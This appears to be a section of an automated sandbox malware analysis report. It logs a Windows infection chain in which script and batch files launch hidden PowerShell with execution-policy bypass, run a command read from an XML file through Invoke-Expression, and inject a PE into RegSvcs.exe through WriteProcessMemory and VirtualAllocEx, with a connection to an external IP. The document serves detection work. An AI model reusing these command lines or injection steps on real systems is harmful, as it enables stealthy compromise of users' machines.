              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.23.222.200 222Jump to behavior
              .NET source code references suspicious native API functions
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, Native.csReference to suspicious API methods: JtDtnInkGODahNXIQI.OkNXZ9njn(GetProcAddress(LoadLibraryA(ref name), ref method), xIHuvANJJn0kSqvmtF.OkNXZ9njn(typeof(CreateApi).TypeHandle, xIHuvANJJn0kSqvmtF.que2rYFgP), JtDtnInkGODahNXIQI.dHk0ppDBU)
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, Native.csReference to suspicious API methods: JtDtnInkGODahNXIQI.OkNXZ9njn(GetProcAddress(LoadLibraryA(ref name), ref method), xIHuvANJJn0kSqvmtF.OkNXZ9njn(typeof(CreateApi).TypeHandle, xIHuvANJJn0kSqvmtF.que2rYFgP), JtDtnInkGODahNXIQI.dHk0ppDBU)
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.csReference to suspicious API methods: Native.WriteProcessMemory(processInformation.ProcessHandle, num6 + num8, array2, array2.Length, ref bytesRead)
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.csReference to suspicious API methods: Native.ReadProcessMemory(processInformation.ProcessHandle, num16 + 8, ref buffer2, 4, ref bytesRead)
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.csReference to suspicious API methods: Native.VirtualAllocEx(processInformation.ProcessHandle, num9, length, 12288, 64)
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D93008
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9F4008
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FFF008
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $commandJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" sessionJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "Jump to behavior
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" sessionJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "Jump to behavior
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
